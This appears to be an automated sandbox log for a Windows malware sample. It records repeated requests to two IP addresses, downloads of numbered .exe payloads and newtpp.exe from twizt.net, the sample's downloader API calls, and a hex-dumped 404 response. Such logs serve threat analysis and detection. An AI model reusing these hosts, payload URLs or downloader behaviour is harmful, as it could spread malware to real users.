    Source: global trafficHTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 45.93.20.18
    Source: global trafficHTTP traffic detected: GET /3 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 45.93.20.18
    Source: global trafficHTTP traffic detected: GET /4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 45.93.20.18
    Source: global trafficHTTP traffic detected: GET /5 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 45.93.20.18
    Source: global trafficHTTP traffic detected: GET /1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 91.202.233.141
    Source: global trafficHTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 91.202.233.141
    Source: global trafficHTTP traffic detected: GET /3 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 91.202.233.141
    Source: global trafficHTTP traffic detected: GET /4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 91.202.233.141
    Source: global trafficHTTP traffic detected: GET /5 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 91.202.233.141
    Source: global trafficHTTP traffic detected: GET /1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 45.93.20.18
    Source: global trafficHTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 45.93.20.18
    Source: global trafficHTTP traffic detected: GET /3 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 45.93.20.18
    Source: global trafficHTTP traffic detected: GET /4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 45.93.20.18
    Source: global trafficHTTP traffic detected: GET /5 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 45.93.20.18
    Source: global trafficHTTP traffic detected: GET /1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 91.202.233.141
    Source: global trafficHTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 91.202.233.141
    Source: global trafficHTTP traffic detected: GET /3 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 91.202.233.141
    Source: global trafficHTTP traffic detected: GET /4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 91.202.233.141
    Source: global trafficHTTP traffic detected: GET /5 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 91.202.233.141
    Source: global trafficHTTP traffic detected: GET /1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 45.93.20.18
    Source: global trafficHTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 45.93.20.18
    Source: global trafficHTTP traffic detected: GET /3 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 45.93.20.18
    Source: unknownTCP traffic detected without corresponding DNS query: 91.202.233.141
    Source: unknownTCP traffic detected without corresponding DNS query: 203.188.251.78
    Source: unknownTCP traffic detected without corresponding DNS query: 91.202.233.141
    Source: C:\Users\user\Desktop\a0RkmvhSaf.exeCode function: 0_2_00F81120 GetTickCount,srand,ExpandEnvironmentStringsW,rand,rand,wsprintfW,wsprintfW,InternetOpenW,InternetOpenUrlW,CreateFileW,InternetReadFile,InternetReadFile,WriteFile,WriteFile,InternetReadFile,CloseHandle,wsprintfW,DeleteFileW,CloseHandle,wsprintfW,InternetCloseHandle,InternetCloseHandle,Sleep,Sleep,rand,Sleep,rand,rand,wsprintfW,URLDownloadToFileW,wsprintfW,DeleteFileW,0_2_00F81120
    Source: global trafficHTTP traffic detected: GET /newtpp.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36Host: twizt.net
    Source: global trafficHTTP traffic detected: GET /peinstall.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36Host: twizt.net
    Source: global trafficHTTP traffic detected: GET /1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 91.202.233.141
    Source: global trafficHTTP traffic detected: GET /1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 91.202.233.141
    Source: global trafficHTTP traffic detected: GET /1.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 91.202.233.141
    Source: global trafficHTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 91.202.233.141
    Source: global trafficHTTP traffic detected: GET /3 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 91.202.233.141
    Source: global trafficHTTP traffic detected: GET /4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 91.202.233.141
    Source: global trafficHTTP traffic detected: GET /2.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 91.202.233.141
    Source: global trafficHTTP traffic detected: GET /5 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 91.202.233.141
    Source: global trafficHTTP traffic detected: GET /1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 45.93.20.18
    Source: global trafficHTTP traffic detected: GET /3.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 91.202.233.141
    Source: global trafficHTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 45.93.20.18
    Source: global trafficHTTP traffic detected: GET /4.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 91.202.233.141
    Source: global trafficHTTP traffic detected: GET /3 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 45.93.20.18
    Source: global trafficHTTP traffic detected: GET /5.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 91.202.233.141
    Source: global trafficHTTP traffic detected: GET /4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 45.93.20.18
    Source: global trafficHTTP traffic detected: GET /5 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 45.93.20.18
    Source: global trafficHTTP traffic detected: GET /6.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 91.202.233.141
    Source: global trafficHTTP traffic detected: GET /1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 91.202.233.141
    Source: global trafficHTTP traffic detected: GET /7.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 91.202.233.141
    Source: global trafficHTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 91.202.233.141
    Source: global trafficHTTP traffic detected: GET /3 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 91.202.233.141
    Source: global trafficHTTP traffic detected: GET /8.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 91.202.233.141
    Source: global trafficHTTP traffic detected: GET /4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 91.202.233.141
    Source: global trafficHTTP traffic detected: GET /5 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 91.202.233.141
    Source: global trafficHTTP traffic detected: GET /9.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 91.202.233.141
    Source: global trafficHTTP traffic detected: GET /1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 45.93.20.18
    Source: global trafficHTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 45.93.20.18
    Source: global trafficHTTP traffic detected: GET /10.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 91.202.233.141
    Source: global trafficHTTP traffic detected: GET /3 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 45.93.20.18
    Source: global trafficHTTP traffic detected: GET /11.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 91.202.233.141
    Source: global trafficHTTP traffic detected: GET /4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 45.93.20.18
    Source: global trafficHTTP traffic detected: GET /5 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 45.93.20.18
    Source: global trafficHTTP traffic detected: GET /12.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 91.202.233.141
    Source: global trafficHTTP traffic detected: GET /1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 91.202.233.141
    Source: global trafficHTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 91.202.233.141
    Source: global trafficHTTP traffic detected: GET /3 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 91.202.233.141
    Source: global trafficHTTP traffic detected: GET /4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 91.202.233.141
    Source: global trafficHTTP traffic detected: GET /5 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 91.202.233.141
    Source: global trafficHTTP traffic detected: GET /1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 45.93.20.18
    Source: global trafficHTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 45.93.20.18
    Source: global trafficHTTP traffic detected: GET /3 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 45.93.20.18
    Source: global trafficHTTP traffic detected: GET /4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 45.93.20.18
    Source: global trafficHTTP traffic detected: GET /5 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 45.93.20.18
    Source: global trafficHTTP traffic detected: GET /1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 91.202.233.141
    Source: global trafficHTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 91.202.233.141
    Source: global trafficHTTP traffic detected: GET /3 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 91.202.233.141
    Source: global trafficHTTP traffic detected: GET /4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 91.202.233.141
    Source: global trafficHTTP traffic detected: GET /5 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 91.202.233.141
    Source: global trafficHTTP traffic detected: GET /1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 45.93.20.18
    Source: global trafficHTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 45.93.20.18
    Source: global trafficHTTP traffic detected: GET /3 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 45.93.20.18
    Source: global trafficHTTP traffic detected: GET /4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 45.93.20.18
    Source: global trafficHTTP traffic detected: GET /5 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 45.93.20.18
    Source: global trafficHTTP traffic detected: GET /1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 91.202.233.141
    Source: global trafficHTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 91.202.233.141
    Source: global trafficHTTP traffic detected: GET /3 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 91.202.233.141
    Source: global trafficHTTP traffic detected: GET /4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 91.202.233.141
    Source: global trafficHTTP traffic detected: GET /5 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 91.202.233.141
    Source: global trafficHTTP traffic detected: GET /1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 45.93.20.18
    Source: global trafficHTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 45.93.20.18
    Source: global trafficHTTP traffic detected: GET /3 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 45.93.20.18
    Source: global trafficHTTP traffic detected: GET /4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 45.93.20.18
    Source: global trafficHTTP traffic detected: GET /5 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 45.93.20.18
    Source: global trafficHTTP traffic detected: GET /1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 91.202.233.141
    Source: global traffic | HTTP traffic detected: GET /2 HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 | Host: 91.202.233.141
    Source: global traffic | HTTP traffic detected: GET /3 HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 | Host: 91.202.233.141
    Source: global traffic | HTTP traffic detected: GET /4 HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 | Host: 91.202.233.141
    Source: global traffic | HTTP traffic detected: GET /5 HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 | Host: 91.202.233.141
    Source: global traffic | HTTP traffic detected: GET /1 HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 | Host: 45.93.20.18
    Source: global traffic | HTTP traffic detected: GET /2 HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 | Host: 45.93.20.18
    Source: global traffic | HTTP traffic detected: GET /3 HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 | Host: 45.93.20.18
    Source: global traffic | HTTP traffic detected: GET /4 HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 | Host: 45.93.20.18
    Source: global traffic | HTTP traffic detected: GET /5 HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 | Host: 45.93.20.18
    Source: global traffic | HTTP traffic detected: GET /1 HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 | Host: 91.202.233.141
    Source: global traffic | HTTP traffic detected: GET /2 HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 | Host: 91.202.233.141
    Source: global traffic | HTTP traffic detected: GET /3 HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 | Host: 91.202.233.141
    Source: global traffic | HTTP traffic detected: GET /4 HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 | Host: 91.202.233.141
    Source: global traffic | HTTP traffic detected: GET /5 HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 | Host: 91.202.233.141
    Source: global traffic | HTTP traffic detected: GET /1 HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 | Host: 45.93.20.18
    Source: global traffic | HTTP traffic detected: GET /2 HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 | Host: 45.93.20.18
    Source: global traffic | HTTP traffic detected: GET /3 HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 | Host: 45.93.20.18
    Source: global traffic | DNS traffic detected: DNS query: twizt.net
    Source: global traffic | DNS traffic detected: DNS query: 56.163.245.4.in-addr.arpa
    Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.18.0 (Ubuntu) | Date: Sun, 09 Mar 2025 12:54:11 GMT | Content-Type: text/html | Content-Length: 564 | Connection: keep-alive | Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a | Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
